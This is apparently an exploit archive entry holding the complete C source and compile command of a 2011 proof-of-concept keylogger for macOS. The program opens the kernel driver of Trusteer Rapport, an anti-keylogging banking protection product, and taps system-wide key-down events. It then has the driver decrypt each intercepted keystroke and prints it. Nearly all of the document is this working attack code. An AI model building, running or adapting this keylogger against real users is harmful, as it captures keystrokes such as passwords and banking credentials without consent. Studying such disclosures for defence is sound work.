Trusteer Rapport key decryptor / keylogger exploit that uses Trusteer's own functionality to 'decrypt' keys directly.
c8f6cb87a1da1cd5f8ebbf54d12f5416d0be16db65d6f07abce191af94431441
/* rapport-listen.c
*
* Copyright (c) 2011 by <mu-b@digit-labs.org>
*
* Trusteer Rapport key decryptor/keylogger
* by mu-b - Thu 07 Jul 2011
*
* - Tested on: Trusteer Rapport (Apple MACOS X 10.6.4)
*
* erm, broken design you might say? some might say useless.
*
* compile: gcc -Wall rapport-listen.c -o rapport-listen -framework IOKit -framework ApplicationServices
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2011!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <ApplicationServices/ApplicationServices.h>
io_connect_t rapport_port;
static CGEventRef
keylogger_callback (CGEventTapProxy proxy, CGEventType type,
CGEventRef event, void *refcon)
{
kern_return_t kr;
uint64_t input_key, decrypt_key;
uint32_t decrypt_size;
if (type != kCGEventKeyDown)
return (event);
CGKeyCode keycode = (CGKeyCode) CGEventGetIntegerValueField (event, kCGKeyboardEventKeycode);
input_key = keycode;
decrypt_key = 0;
decrypt_size = 1;
kr = IOConnectCallScalarMethod (rapport_port, 1, &input_key, 1, &decrypt_key, &decrypt_size);
if (kr == kIOReturnSuccess)
{
fprintf (stdout, "output, e: %d, d: %d\n", (uint32_t) input_key, (uint32_t) decrypt_key);
}
return (event);
}
int
main (int argc, char **argv)
{
CFMachPortRef eventTap;
CGEventMask eventMask;
CFRunLoopSourceRef runLoopSource;
io_service_t service;
kern_return_t kr;
printf ("Trusteer Rapport key decryptor/keylogger\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2011!@$!\n\n");
service = IOServiceGetMatchingService (kIOMasterPortDefault,
IOServiceMatching("com_trusteer_rapportke"));
if (!service)
{
fprintf (stderr, "* IOServiceGetMatchingService failed, rapport running?\n");
return (EXIT_FAILURE);
}
rapport_port = (io_connect_t) 0;
kr = IOServiceOpen (service, mach_task_self (), 0, &rapport_port);
IOObjectRelease (service);
if (kr != kIOReturnSuccess)
{
fprintf (stderr, "* IOServiceOpen failed\n");
return (EXIT_FAILURE);
}
eventMask = (1 << kCGEventKeyDown);
eventTap = CGEventTapCreate (kCGSessionEventTap, kCGHeadInsertEventTap, 0,
eventMask, keylogger_callback, NULL);
if (!eventTap)
{
fprintf (stderr, "* failed to create event tap\n");
return (EXIT_FAILURE);
}
runLoopSource = CFMachPortCreateRunLoopSource (kCFAllocatorDefault, eventTap, 0);
CFRunLoopAddSource (CFRunLoopGetCurrent (), runLoopSource, kCFRunLoopCommonModes);
CGEventTapEnable (eventTap, true);
printf ("* waiting for keys\n");
CFRunLoopRun ();
return (EXIT_SUCCESS);
}